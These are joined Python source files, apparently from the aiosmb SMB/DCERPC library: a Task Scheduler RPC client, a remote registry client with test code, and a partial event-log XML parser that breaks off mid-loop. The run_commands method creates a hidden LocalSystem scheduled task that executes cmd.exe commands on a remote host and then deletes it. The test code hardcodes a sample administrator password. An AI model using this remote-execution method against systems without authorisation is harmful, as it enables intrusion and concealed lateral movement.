from typing import Tuple
import os
import asyncio
import traceback

from aiosmb import logger
from aiosmb.connection import SMBConnection
from aiosmb.dcerpc.v5.connection import DCERPC5Connection
from aiosmb.dcerpc.v5 import tsch
from aiosmb.dcerpc.v5.interfaces.endpointmgr import EPM
from aiosmb.dcerpc.v5.common.connection.smbdcefactory import SMBDCEFactory
from aiosmb.dcerpc.v5.dtypes import NULL
from aiosmb.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_NONE,\
	RPC_C_AUTHN_LEVEL_CONNECT,\
	RPC_C_AUTHN_LEVEL_CALL,\
	RPC_C_AUTHN_LEVEL_PKT,\
	RPC_C_AUTHN_LEVEL_PKT_INTEGRITY,\
	RPC_C_AUTHN_LEVEL_PKT_PRIVACY,\
	DCERPCException, RPC_C_AUTHN_GSS_NEGOTIATE


class TSCHRPC:
	def __init__(self):
		self.service_pipename = r'\atsvc'
		self.service_uuid = tsch.MSRPC_UUID_TSCHS
		self.dce = None
		
	async def __aenter__(self):
		return self
		
	async def __aexit__(self, exc_type, exc, traceback):
		await self.close()
		return True,None
	
	async def close(self):
		try:
			if self.dce:
				try:
					await self.dce.disconnect()
				except:
					pass
				return
			
			return True,None
		except Exception as e:
			return None, e
	
	@staticmethod
	async def from_rpcconnection(connection:DCERPC5Connection, auth_level = None, open:bool = True, perform_dummy:bool = False):
		try:
			service = TSCHRPC()
			service.dce = connection
			
			service.dce.set_auth_level(auth_level)
			if auth_level is None:
				service.dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY) #secure default :P
			
			_, err = await service.dce.connect()
			if err is not None:
				raise err
			
			_, err = await service.dce.bind(service.service_uuid)
			if err is not None:
				raise err
				
			return service, None
		except Exception as e:
			return False, e
	
	@staticmethod
	async def from_smbconnection(connection:SMBConnection, auth_level = None, open:bool = True, perform_dummy:bool = False):
		"""
		Creates the connection to the service using an established SMBConnection.
		This connection will use the given SMBConnection as transport layer.
		"""
		try:
			if auth_level is None:
				auth_level = RPC_C_AUTHN_LEVEL_CONNECT
			rpctransport = SMBDCEFactory(connection, filename=TSCHRPC().service_pipename)		
			service, err = await TSCHRPC.from_rpcconnection(rpctransport.get_dce_rpc(), auth_level=auth_level, open=open, perform_dummy = perform_dummy)	
			if err is not None:
				raise err

			return service, None
		except Exception as e:
			return None, e
	
	async def register_task(self, template, task_name = None, flags = tsch.TASK_CREATE, sddl = NULL, logon_type = tsch.TASK_LOGON_NONE):
		if task_name is None:
			task_name = os.urandom(5).hex()
		if task_name[0] != '\\':
			task_name = '\\' + task_name

		if sddl is None:
			sddl = NULL

		res, err = await tsch.hSchRpcRegisterTask(self.dce, task_name, template, flags, sddl, logon_type)
		if err is not None:
			return None, err
		
		task_name = res['pActualPath']
		
		return task_name, err
	
	async def get_task_last_run_info(self, task_name):
		if task_name[0] != '\\':
			task_name = '\\' + task_name

		res, err = await tsch.hSchRpcGetLastRunInfo(self.dce, task_name)
		if err is not None:
			return None, err

		t = {
			'Year' : res['pLastRuntime']['wYear'],
			'Month' : res['pLastRuntime']['wMonth'],
			'DayOfWeek' : res['pLastRuntime']['wDayOfWeek'],
			'Day' : res['pLastRuntime']['wDay'],
			'Hour' : res['pLastRuntime']['wHour'],
			'Minute' : res['pLastRuntime']['wMinute'],
			'Second' : res['pLastRuntime']['wSecond'],
			'Miliseconds' : res['pLastRuntime']['wMilliseconds'],
			'LastReturnCode' : res['pLastRuntime']
		}
		return t, err

	async def delete_task(self, task_name):
		"""
		Deletes a task
		"""

		if task_name[0] != '\\':
			task_name = '\\' + task_name

		_, err = await tsch.hSchRpcDelete(self.dce, task_name)
		if err is not None:
			return False, err

		return True, err

	async def run_task(self, task_name):
		"""
		Starts a task
		"""
		if task_name[0] != '\\':
			task_name = '\\' + task_name
		
		_, err = await tsch.hSchRpcRun(self.dce, task_name)
		return True, err

	async def list_tasks(self, path = '\\'):
		"""
		Lists all available tasks on the remote machine
		"""
		try:
			resp, err = await tsch.hSchRpcEnumTasks(self.dce, path)
			if err is not None:
				yield None, err
				return
			
			for name in resp['pNames']:
				yield name['Data'].replace('\x00',''), None
		
		except Exception as e:
			yield None, e
			return

	async def run_commands(self, commands, maxwait = 10):
		"""
		Executes a list of shell commands by scheduling a new task and starts it.
		At the end the new task will be deleted
		"""
		template = self.gen_xml(commands)
		task_name, err = await self.register_task(template)
		if err is not None:
			return None, err

		_, err = await self.run_task(task_name)
		if err is not None:
			return None, err


		while True:
			if maxwait < 0:
				return None, Exception('maxwait timeout!')
			
			res, err = await self.get_task_last_run_info(task_name)
			if err is not None:
				return None, err
			
			if res['Year'] != 0:
				break
			
			maxwait -= 3
			await asyncio.sleep(3)
			

		res, err = await self.delete_task(task_name)
		if err is not None:
			return None, err

		return True, None


	def gen_xml(self, commands):

		return """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
	<CalendarTrigger>
	  <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary>
	  <Enabled>true</Enabled>
	  <ScheduleByDay>
		<DaysInterval>1</DaysInterval>
	  </ScheduleByDay>
	</CalendarTrigger>
  </Triggers>
  <Principals>
	<Principal id="LocalSystem">
	  <UserId>S-1-5-18</UserId>
	  <RunLevel>HighestAvailable</RunLevel>
	</Principal>
  </Principals>
  <Settings>
	<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
	<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
	<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
	<AllowHardTerminate>true</AllowHardTerminate>
	<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
	<IdleSettings>
	  <StopOnIdleEnd>true</StopOnIdleEnd>
	  <RestartOnIdle>false</RestartOnIdle>
	</IdleSettings>
	<AllowStartOnDemand>true</AllowStartOnDemand>
	<Enabled>true</Enabled>
	<Hidden>true</Hidden>
	<RunOnlyIfIdle>false</RunOnlyIfIdle>
	<WakeToRun>false</WakeToRun>
	<ExecutionTimeLimit>P3D</ExecutionTimeLimit>
	<Priority>7</Priority>
  </Settings>
  <Actions Context="LocalSystem">
	{}
  </Actions>
</Task>
""".format(self.gen_commands(commands))

	def gen_commands(self, commands):
		ret = ""
		for command in commands:
			ret += """
	 <Exec>
	  <Command>cmd.exe</Command>
	  <Arguments>/C {}</Arguments>
	 </Exec>""".format(self.xml_escape(command))

		return ret
	
	def xml_escape(self, data):
		replace_table = {
			 "&": "&amp;",
			 '"': "&quot;",
			 "'": "&apos;",
			 ">": "&gt;",
			 "<": "&lt;",
			 }
		return ''.join(replace_table.get(c, c) for c in data)




import enum

from aiosmb.dcerpc.v5.common.connection.smbdcefactory import SMBDCEFactory
from aiosmb.connection import SMBConnection
from aiosmb.dcerpc.v5.connection import DCERPC5Connection
from aiosmb.dcerpc.v5 import rrp
from aiosmb import logger
from aiosmb.dcerpc.v5 import system_errors
from aiosmb.wintypes.dtyp.structures.filetime import FILETIME
from winacl.dtyp.security_descriptor import SECURITY_DESCRIPTOR
from aiosmb.wintypes.dtyp.constrcuted_security.security_information import SECURITY_INFORMATION
from aiosmb.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_NONE,\
	RPC_C_AUTHN_LEVEL_CONNECT,\
	RPC_C_AUTHN_LEVEL_CALL,\
	RPC_C_AUTHN_LEVEL_PKT,\
	RPC_C_AUTHN_LEVEL_PKT_INTEGRITY,\
	RPC_C_AUTHN_LEVEL_PKT_PRIVACY,\
	DCERPCException, RPC_C_AUTHN_GSS_NEGOTIATE

class HKEY(enum.Enum):
	CLASSES_ROOT = 0 #Registry entries subordinate to this key define types (or classes) of documents and the properties associated with those types. Shell and COM applications use the information stored under this key.
	CURRENT_USER = 1 #Registry entries subordinate to this key define the preferences of the current user. These preferences include the settings of environment variables, data about program groups, colors, printers, network connections, and application preferences.
	LOCAL_MACHINE = 2 #Registry entries subordinate to this key define the physical state of the computer, including data about the bus type, system memory, and installed hardware and software.
	USERS = 3 #Registry entries subordinate to this key define the default user configuration for new users on the local computer and the user configuration for the current user.
	PERFORMANCE_DATA = 4 #Registry entries subordinate to this key allow you to access performance data. The data is not actually stored in the registry; the registry functions cause the system to collect the data from its source.
	CURRENT_CONFIG = 5 #Contains information about the current hardware profile of the local computer system.
	DYN_DATA = 6 #This key is not used in versions of Windows after 98.

hkey_abbrev = {
	'HKEY_LOCAL_MACHINE' : HKEY.LOCAL_MACHINE,
	'HKLM' : HKEY.LOCAL_MACHINE,
	'HKEY_CURRENT_USER' : HKEY.CURRENT_USER,
	'HKCU' : HKEY.CURRENT_USER,
	'HKEY_CLASSES_ROOT' : HKEY.CLASSES_ROOT,
	'HKCR' : HKEY.CLASSES_ROOT,
	'HKEY_USERS' : HKEY.USERS,
	'HKU' : HKEY.USERS,
	'HKEY_PERFORMANCE_DATA' : HKEY.PERFORMANCE_DATA,
	'HKPD' : HKEY.PERFORMANCE_DATA,
	'HKEY_CURRENT_CONFIG' : HKEY.CURRENT_CONFIG,
	'HKCC' : HKEY.PERFORMANCE_DATA,
}

class REG_ACCESS_MASK(enum.IntFlag):
	GENERIC_READ            = 0x80000000
	GENERIC_WRITE           = 0x4000000
	GENERIC_EXECUTE         = 0x20000000
	GENERIC_ALL             = 0x10000000
	MAXIMUM_ALLOWED         = 0x02000000
	ACCESS_SYSTEM_SECURITY  = 0x01000000
	SYNCHRONIZE             = 0x00100000
	WRITE_OWNER             = 0x00080000
	WRITE_DACL              = 0x00040000
	READ_CONTROL            = 0x00020000
	DELETE                  = 0x00010000

class REG_VAL_TYPE(enum.Enum):
	BINARY              = 3
	DWORD               = 4
	DWORD_LITTLE_ENDIAN = 4
	DWORD_BIG_ENDIAN    = 5
	EXPAND_SZ           = 2
	LINK                = 6
	MULTI_SZ            = 7
	NONE                = 0
	QWORD               = 11
	QWORD_LITTLE_ENDIAN = 11
	SZ                  = 1 

def reg_decode_value(value_type, value_data):
	if value_type == REG_VAL_TYPE.SZ:
		return value_data.decode('utf-16-le')
	elif value_type in [REG_VAL_TYPE.DWORD, REG_VAL_TYPE.DWORD_LITTLE_ENDIAN]:
		return int.from_bytes(value_data, byteorder='little', signed = False)
	elif value_type == REG_VAL_TYPE.DWORD_BIG_ENDIAN:
		return int.from_bytes(value_data, byteorder='big', signed = False)
	elif value_type in [REG_VAL_TYPE.QWORD, REG_VAL_TYPE.QWORD_LITTLE_ENDIAN]:
		return int.from_bytes(value_data, byteorder='little', signed = False)
	
	return value_data

class RRPRPC:
	def __init__(self):
		self.service_pipename = r'\winreg'
		self.service_uuid = rrp.MSRPC_UUID_RRP
		self.dce = None
		self.handles = {}
		self.__current_handle_id = 0
	
	def __get_handle(self, hkey):
		hid = self.__current_handle_id
		self.__current_handle_id += 1
		self.handles[hid] = hkey
		return hid

	async def __get_rawhandle(self, key):
		if isinstance(key, HKEY):
			key, err = await self.ConnectRegistry(key)
			if err is not None:
				raise err
		
		return self.handles[key]

	async def __aenter__(self):
		return self
		
	async def __aexit__(self, exc_type, exc, traceback):
		await self.close()
		return True, None

	async def close(self):
		try:
			for hkey in self.handles:
				await self.CloseKey(hkey)

			await self.dce.disconnect()
		except Exception as e:
			return False, e

	@staticmethod
	async def from_rpcconnection(connection:DCERPC5Connection, auth_level = None, open:bool = True, perform_dummy:bool = False):
		try:
			service = RRPRPC()
			service.dce = connection
			
			service.dce.set_auth_level(auth_level)
			if auth_level is None:
				service.dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY) #secure default :P 
			
			_, err = await service.dce.connect()
			if err is not None:
				raise err
			
			_, err = await service.dce.bind(service.service_uuid)
			if err is not None:
				raise err
				
			return service, None
		except Exception as e:
			return False, e
	
	@staticmethod
	async def from_smbconnection(connection:SMBConnection, auth_level = None, open:bool = True, perform_dummy:bool = False):
		"""
		Creates the connection to the service using an established SMBConnection.
		This connection will use the given SMBConnection as transport layer.
		"""
		try:
			if auth_level is None:
				#for SMB connection no extra auth needed
				auth_level = RPC_C_AUTHN_LEVEL_NONE
			rpctransport = SMBDCEFactory(connection, filename=RRPRPC().service_pipename)		
			service, err = await RRPRPC.from_rpcconnection(rpctransport.get_dce_rpc(), auth_level=auth_level, open=open, perform_dummy = perform_dummy)	
			if err is not None:
				raise err

			return service, None
		except Exception as e:
			return None, e


	async def CloseKey(self, key):
		try:
			key = await self.__get_rawhandle(key)
			_, err = await rrp.hBaseRegCloseKey(self.dce, key)
			if err is not None:
				raise err
			return True, None
		except Exception as e:
			if isinstance(e, rrp.DCERPCSessionError):
				return None, OSError(e.get_error_code(), system_errors.ERROR_MESSAGES[e.get_error_code()][1])
			return None, e

	async def ConnectRegistry(self, key, access = REG_ACCESS_MASK.MAXIMUM_ALLOWED):
		try:
			
			res = None
			err = None
			if key == HKEY.CLASSES_ROOT:
				res, err = await rrp.hOpenClassesRoot(self.dce, samDesired = access.value)

			elif key == HKEY.CURRENT_USER:
				res, err = await rrp.hOpenCurrentUser(self.dce, samDesired = access.value)
			
			elif key == HKEY.LOCAL_MACHINE:
				res, err = await rrp.hOpenLocalMachine(self.dce, samDesired = access.value)
			
			elif key == HKEY.USERS:
				res, err = await rrp.hOpenUsers(self.dce, samDesired = access.value)
			
			elif key == HKEY.PERFORMANCE_DATA:
				res, err = await rrp.hOpenPerformanceData(self.dce, samDesired = access.value)

			elif key == HKEY.CURRENT_CONFIG:
				res, err = await rrp.hOpenCurrentConfig(self.dce, samDesired = access.value)
			
			else:
				raise Exception('Not supported registry hive to open: %s' % key.name)
			
			if err is not None:
				return None, err

			return self.__get_handle(res['phKey']), None
		
		except Exception as e:
			if isinstance(e, rrp.DCERPCSessionError):
				return None, OSError(e.get_error_code(), system_errors.ERROR_MESSAGES[e.get_error_code()][1])
			return None, e

	async def CreateKey(self, key, sub_key, access=REG_ACCESS_MASK.MAXIMUM_ALLOWED):
		try:
			key = await self.__get_rawhandle(key)
			res, err = await rrp.hBaseRegCreateKey(self.dce, key, sub_key, samDesired = access.value)
			if err is not None:
				raise err

			return self.__get_handle(res['phkResult']), None
		except Exception as e:
			if isinstance(e, rrp.DCERPCSessionError):
				return None, OSError(e.get_error_code(), system_errors.ERROR_MESSAGES[e.get_error_code()][1])
			return None, e

	async def DeleteKey(self, key, sub_key):
		try:
			key = await self.__get_rawhandle(key)
			
			res, err = await rrp.hBaseRegDeleteKey(self.dce, key, sub_key)
			if err is not None:
				raise err	
			return True, None

		except Exception as e:
			if isinstance(e, rrp.DCERPCSessionError):
				return None, OSError(e.get_error_code(), system_errors.ERROR_MESSAGES[e.get_error_code()][1])
			return None, e

	async def DeleteValue(self, key, value):
		try:
			key = await self.__get_rawhandle(key)
			
			_, err = await  rrp.hBaseRegDeleteValue(self.dce, key, value)
			if err is not None:
				raise err
			
			return True, None
		
		except Exception as e:
			if isinstance(e, rrp.DCERPCSessionError):
				return None, OSError(e.get_error_code(), system_errors.ERROR_MESSAGES[e.get_error_code()][1])
			return None, e

	async def EnumKey(self, key, index):
		try:
			key = await self.__get_rawhandle(key)
			res, err = await rrp.hBaseRegEnumKey(self.dce, key, index)
			if err is not None:
				raise err
			return res['lpNameOut'], None
		
		except Exception as e:
			if isinstance(e, rrp.DCERPCSessionError):
				return None, OSError(e.get_error_code(), system_errors.ERROR_MESSAGES[e.get_error_code()][1])
			return None, e

	async def EnumValue(self, key, index):
		try:
			key = await self.__get_rawhandle(key)
			res, err = await rrp.hBaseRegEnumValue(self.dce, key, index)
			if err is not None:
				raise err
			
			value_name = res['lpValueNameOut']
			value_type = REG_VAL_TYPE(res['lpType'])
			value_data = reg_decode_value(value_type ,b''.join(res['lpData']))
			return value_name, value_type, value_data, None
		except Exception as e:
			if isinstance(e, rrp.DCERPCSessionError):
				return None, None, None, OSError(e.get_error_code(), system_errors.ERROR_MESSAGES[e.get_error_code()][1])
			return None, None, None, e

	async def FlushKey(self, key):
		try:
			key = await self.__get_rawhandle(key)
			_, err = await rrp.hBaseRegFlushKey(self.dce, key)
			return True, err
		except Exception as e:
			if isinstance(e, rrp.DCERPCSessionError):
				return None, OSError(e.get_error_code(), system_errors.ERROR_MESSAGES[e.get_error_code()][1])
			return None, e

	async def LoadKey(self, key, sub_key, file_name):
		try:
			key = await self.__get_rawhandle(key)
			_, err = await rrp.hBaseRegLoadKey(self.dce, key, sub_key, file_name)
			if err is not None:
				raise err

			return True, None
		except Exception as e:
			if isinstance(e, rrp.DCERPCSessionError):
				return None, OSError(e.get_error_code(), system_errors.ERROR_MESSAGES[e.get_error_code()][1])
			return None, e

	async def OpenKey(self, key, sub_key, reserved=0, access=REG_ACCESS_MASK.MAXIMUM_ALLOWED):
		try:
			key = await self.__get_rawhandle(key)
			res , err = await rrp.hBaseRegOpenKey(self.dce, key, sub_key, access.value)
			if err is not None:
				raise err
			return self.__get_handle(res['phkResult']), None
		
		except Exception as e:
			if isinstance(e, rrp.DCERPCSessionError):
				return None, OSError(e.get_error_code(), system_errors.ERROR_MESSAGES[e.get_error_code()][1])
			return None, e

	async def QueryInfoKey(self, key):
		try:
			key = await self.__get_rawhandle(key)
			res , err = await rrp.hBaseRegQueryInfoKey(self.dce, key)
			if err is not None:
				raise err
			
			subkey_cnt = res['lpcSubKeys']
			values_cnt = res['lpcValues']
			lastwrite_time = FILETIME.from_dict(res['lpftLastWriteTime']).datetime
			
			return subkey_cnt, values_cnt, lastwrite_time, None

		except Exception as e:
			if isinstance(e, rrp.DCERPCSessionError):
				return None, None, None, OSError(e.get_error_code(), system_errors.ERROR_MESSAGES[e.get_error_code()][1])
			return None, None, None, e
		

	async def GetKeySecurity(self, key, securityInformation = SECURITY_INFORMATION.OWNER):
		try:
			key = await self.__get_rawhandle(key)
			res , err = await rrp.hBaseRegGetKeySecurity(self.dce, key, securityInformation = securityInformation)
			if err is not None:
				raise err
			return SECURITY_DESCRIPTOR.from_bytes(res), None
		
		except Exception as e:
			if isinstance(e, rrp.DCERPCSessionError):
				return None, OSError(e.get_error_code(), system_errors.ERROR_MESSAGES[e.get_error_code()][1])
			return None, e

	async def QueryValue(self, key, value_name, unpack_vals = True):
		try:
			key = await self.__get_rawhandle(key)
			val_type, value , err = await rrp.hBaseRegQueryValue(self.dce, key, value_name, unpack_vals=unpack_vals)
			if err is not None:
				raise err
			return val_type, value, err
		except Exception as e:
			if isinstance(e, rrp.DCERPCSessionError):
				return None, None, OSError(e.get_error_code(), system_errors.ERROR_MESSAGES[e.get_error_code()][1])
			return None, None, e

	async def SaveKey(self, key, file_name):
		try:
			key = await self.__get_rawhandle(key)
			res , err = await rrp.hBaseRegSaveKey(self.dce, key, file_name)
			if err is not None:
				raise err

			return res, None
		except Exception as e:
			if isinstance(e, rrp.DCERPCSessionError):
				return None, OSError(e.get_error_code(), system_errors.ERROR_MESSAGES[e.get_error_code()][1])
			return None, e

	async def SetValue(self, key, sub_key, val_type, val_data):
		
		#the packing is done in the original layer, not sure if everything works but it seems so
		try:
			key = await self.__get_rawhandle(key)
			res, err =  await rrp.hBaseRegSetValue(self.dce, key, sub_key, val_type.value, val_data)
			if err is not None:
				raise err
			return True, None
		except Exception as e:
			if isinstance(e, rrp.DCERPCSessionError):
				return None, None, OSError(e.get_error_code(), system_errors.ERROR_MESSAGES[e.get_error_code()][1])
			return None, None, e

	async def OpenPerformanceText(self):
		try:
			res , err = await rrp.hOpenPerformanceText(self.dce)
			if err is not None:
				raise err
			return res['phKey'], None
		except Exception as e:
			if isinstance(e, rrp.DCERPCSessionError):
				return None, None, OSError(e.get_error_code(), system_errors.ERROR_MESSAGES[e.get_error_code()][1])
			return None, None, e

	async def OpenPerformanceNlsText(self):
		try:
			res , err = await rrp.hOpenPerformanceNlsText(self.dce)
			if err is not None:
				raise err
			return res['phKey'], None
		except Exception as e:
			if isinstance(e, rrp.DCERPCSessionError):
				return None, None, OSError(e.get_error_code(), system_errors.ERROR_MESSAGES[e.get_error_code()][1])
			return None, None, e

	async def OpenRegPath(self, fullpath, access = REG_ACCESS_MASK.MAXIMUM_ALLOWED):
		try:
			reg_root, key_path = fullpath.split('\\',1)
			root_key = hkey_abbrev[reg_root]

			key, err = await self.ConnectRegistry(root_key, access = access)
			if err is not None:
				return None, err
			return await self.OpenKey(key, key_path, access = access)
		except Exception as e:
			if isinstance(e, rrp.DCERPCSessionError):
				return None, None, OSError(e.get_error_code(), system_errors.ERROR_MESSAGES[e.get_error_code()][1])
			return None, e

	######### custom methods

	async def ListUsers(self, users_handle = None):
		try:
			if users_handle is None:
				users_handle, err = await self.ConnectRegistry(HKEY.USERS)
				if err is not None:
					raise err
			
			users = []
			for i in range(255):
				res, err = await self.EnumKey(users_handle, i)
				if err is not None:
					if err.errno == 259: #no more data is available
						break
					raise err
				if res.startswith('S-1-5-') is True:
					users.append(res[:-1])
			return users, None
		except Exception as e:
			return None, e


################## CUT HERE
class PERF_OBJECT_TYPE:
	def __init__(self):
		self.TotalByteLength = None
		self.DefinitionLength = None
		self.HeaderLength = None
		self.ObjectNameTitleIndex = None
		self.ObjectNameTitle = None
		self.ObjectHelpTitleIndex = None
		self.ObjectHelpTitle = None
		self.DetailLevel = None
		self.NumCounters = None
		self.DefaultCounter = None
		self.NumInstances = None
		self.CodePage = None
		self.PerfTime = None
		self.PerfFreq = None
		self.TotalByteLength = None
		self.TotalByteLength = None
		self.TotalByteLength = None

async def preftest(rs):
	pref_handle, err = await rs.ConnectRegistry(HKEY.PERFORMANCE_DATA)
	if err is not None:
		print('users error! %s' % err)
		return

	val_type, val_data, err = await rs.QueryValue(pref_handle, 'Counter 009', unpack_vals=False)
	if err is not None:
		print(traceback.format_tb(err.__traceback__))
		print('users error! %s' % err)
		return

	print(val_data[:100])

	return

async def OpenRegPathTest(rs):
	hk, err = await rs.OpenRegPath(r'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion')
	print(err)

	res, err = await rs.QueryInfoKey(hk)
	print(res.dump())

	for i in range(200):
		value_name, value_type, value_data, err = await rs.EnumValue(hk, i)
		if err is not None:
			if err.errno == 259: #no more data is available
				break
			print(traceback.format_tb(err.__traceback__))
		print(value_data)

	return

async def ConnectRegistryTest(rs):
	import traceback
	users_handle, err = await rs.ConnectRegistry(HKEY.USERS)
	if err is not None:
		print('users error! %s' % err)
		return
	print('user handle: %s' % users_handle)
	for i in range(10):
		res, err = await rs.EnumKey(users_handle, i)
		if err is not None:
			if err.errno == 259: #no more data is available
				break
			print(err)
			print(traceback.format_tb(err.__traceback__))
		print(res)
	
	res, err = await rs.OpenKey(users_handle, "S-1-5-21-3448413973-1765323015-1500960949-500")
	if err is not None:
		print('openkey failed! %s' % err)
	
	print(res)
	
	for i in range(10):
		value_name, value_type, value_data, err = await rs.EnumValue(res, i)
		if err is not None:
			if err.errno == 259: #no more data is available
				break
			print(err)
			print(traceback.format_tb(err.__traceback__))
		print(value_data)

async def amain():
	from aiosmb.commons.connection.factory import SMBConnectionFactory
	from aiosmb.connection import SMBConnection
	import traceback

	url = 'smb2+ntlm-password://TEST\\Administrator:Passw0rd!1@10.10.10.2'
	su = SMBConnectionFactory.from_url(url)
	conn = su.get_connection()

	_, err = await conn.login()
	if err is not None:
		print(err)
		return
	else:
		print('SMB Connected!')
	rs = RRP(conn)
	_, err = await rs.connect()
	if err is not None:
		print(err)
		return
	print('RRP Connected!')

	users_handle, err = await rs.ConnectRegistry(HKEY.USERS)
	if err is not None:
		print('users error! %s' % err)
		return

	print('users_handle %s' % users_handle)
	for i in range(10):
		res, err = await rs.EnumKey(users_handle, i)
		if err is not None:
			if err.errno == 259: #no more data is available
				break
			print(err)
			print(traceback.format_tb(err.__traceback__))
		print(res)

	"""
	
	await ConnectRegistryTest(rs)


	res, err = await rs.OpenRegPath(r'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run')
	if err is not None:
		print(err)
	
	subkey_cnt, values_cnt, lastwrite_time, err = await rs.QueryInfoKey(res)
	if err is not None:
		print(err)
	print(subkey_cnt)
	print(values_cnt)
	print(lastwrite_time)

	print(22222222222222222222222222222)
	sd, err = await rs.GetKeySecurity(res, securityInformation=SECURITY_INFORMATION.OWNER|SECURITY_INFORMATION.DACL)
	if err is not None:
		print(err)
	print(sd)

	rx = res
	res2, err = await rs.CreateKey(res, "TEST")
	if err is not None:
		print(err)
	print(res)

	res, err = await rs.SetValue(res2, "TEST", REG_VAL_TYPE.SZ, "TESTING")
	if err is not None:
		print(err)
	print(res)


	#res, err = await rs.DeleteValue(res2, "TEST")
	#if err is not None:
	#	print(err)
	#print(res)

	res, err = await rs.DeleteKey(rx, "TEST")
	if err is not None:
		print(err)
	print(res)
	

	res, err = await rs.CloseKey(res)
	if err is not None:
		print(err)
	print(res)
	"""

if __name__ == '__main__':
	asyncio.run(amain())


# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/23e75ca3-98fd-4396-84e5-86cd9d40d343
import enum

class SECURITY_INFORMATION(enum.IntFlag):
	OWNER = 0x00000001 #The owner identifier of the object is being referenced.
	GROUP = 0x00000002 #The primary group identifier of the object is being referenced.
	DACL = 0x00000004 #The DACL of the object is being referenced.
	SACL = 0x00000008 #The SACL of the object is being referenced.
	LABEL = 0x00000010 #The mandatory integrity label is being referenced.
	UNPROTECTED_SACL = 0x10000000 #The SACL inherits access control entries (ACEs) from the parent object.
	UNPROTECTED_DACL = 0x20000000 #The DACL inherits ACEs from the parent object.
	PROTECTED_SACL = 0x40000000 #The SACL cannot inherit ACEs.
	PROTECTED_DACL = 0x80000000 #The DACL cannot inherit ACEs.
	ATTRIBUTE = 0x00000020 #A SYSTEM_RESOURCE_ATTRIBUTE_ACE (section 2.4.4.15) is being referenced.
	SCOPE = 0x00000040 #A SYSTEM_SCOPED_POLICY_ID_ACE (section 2.4.4.16) is being referenced.
	PROCESS_TRUST_LABEL = 0x00000080 #Reserved.
	BACKUP = 0x00010000



import io
import enum
import struct
from xml.dom.minidom import parseString

from aiosmb.wintypes.dtyp.constrcuted_security.guid import GUID
from aiosmb.wintypes.dtyp.constrcuted_security.sid import SID
from aiosmb.wintypes.dtyp.structures.filetime import FILETIME

# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-even6/c73573ae-1c90-43a2-a65f-ad7501155956

class Fragment:
	def __init__(self):
		self.FragmentHeaders = []
		self.values = []

	def to_xml(self):
		t = ''
		for v in self.values:
			t += v.to_xml()
		return t

	@staticmethod
	def from_bytes(data):
		return Fragment.from_buffer(io.BytesIO(data))

	@staticmethod
	def from_buffer(buff):
		ti = Fragment()
		while True:
			v = parse_next(buff, (FragmentHeader, EOF))
			if isinstance(v, EOF):
				break
			ti.FragmentHeaders.append(v)
			v = parse_next(buff, (Element, TemplateInstance))
			ti.values.append(v) 
		return ti

class FragmentHeader:
	def __init__(self):
		self.FragmentHeaderToken = None
		self.major = None
		self.minor = None
		self.flags = None

	@staticmethod
	def from_buffer(buff):
		res = FragmentHeader()
		res.FragmentHeaderToken = buff.read(1)
		res.major = int.from_bytes(buff.read(1), byteorder = 'little', signed=False)
		res.minor = int.from_bytes(buff.read(1), byteorder = 'little', signed=False)
		res.flags = int.from_bytes(buff.read(1), byteorder = 'little', signed=False)
		if res.major != 1:
			raise Exception('FragmentHeader err')
		return res


class TemplateInstance:
	def __init__(self):
		self.TemplateInstanceToken = None
		self.TemplateDef = None
		self.TemplateInstanceData = None

	def to_xml(self):
		xml_elements = []
		open_tags = []
		

		i = 0
		while i < len(self.TemplateDef.Elements):
			el = self.TemplateDef.Elements[i]
			if isinstance(el, StartElement):
				open_tags.append(el.Name.value)
				if isinstance(self.TemplateDef.Elements[i + 1], CloseStartElement):
					xml_elements.append(el.to_xml(self.TemplateInstanceData))
					i += 2
					continue

				if isinstance(self.TemplateDef.Elements[i + 1], CloseEmptyElement):
					open_tags.pop(-1)
					xml_elements.append(el.to_xml(self.TemplateInstanceData, is_empty = True))
					i += 2
					continue
				

			elif isinstance(el, Substitution):
				if el.token == b'\x0E':
					list_replacement = isinstance(self.TemplateInstanceData.Values[el.SubstitutionId], list)
					if self.TemplateInstanceData.ValueSpec.ValueSpecEntries[el.SubstitutionId].ValueType == ValueType.NullType or list_replacement:
						open_tags.pop(-1)
						xml_elements.pop(-1)
						n = 1
						while True:
							if isinstance(self.TemplateDef.Elements[i + n], EndElement):
								n += 1 # increasing by 2 so we skip the endelement which would cause an error of popping an empty list
								continue
							break
						i += n
						if list_replacement:
							xml_elements.append(el.to_xml(self.TemplateInstanceData))
						continue
				
				xml_elements.append(el.to_xml(self.TemplateInstanceData))

			elif isinstance(el, ValueText):
				xml_elements.append(el.to_xml())

			elif isinstance(el, EndElement):
				xml_elements.append('</%s>' % open_tags.pop(-1))
			
			elif isinstance(el, EOF):
				while len(open_tags) != 0:
					xml_elements.append('</%s>' % open_tags.pop(-1))
			
			else:
				raise Exception('Element not processed! %s' % el.to_xml())

			i+= 1

		return '\r\n'.join(xml_elements)

	@staticmethod
	def from_buffer(buff):
		ti = TemplateInstance()
		ti.TemplateInstanceToken = buff.read(1)
		ti.TemplateDef = TemplateDef.from_buffer(buff)
		ti.TemplateInstanceData = TemplateInstanceData.from_buffer(buff)
		ti.to_xml()

		return ti

class TemplateDef:
	def __init__(self):
		self.dunno = None
		self.TemplateId = None
		self.TemplateDefByteLength = None
		self.FragmentHeader = None
		self.Elements = []

	@staticmethod
	def from_buffer(buff):
		td = TemplateDef()
		td.dunno = buff.read(1) #docu sais it's \xb0 but itts not
		td.TemplateId = GUID.from_buffer(buff)
		td.TemplateDefByteLength = int.from_bytes(buff.read(4), byteorder = 'little', signed=False)

		td.FragmentHeader = parse_next(buff, (FragmentHeader,))
		while True:
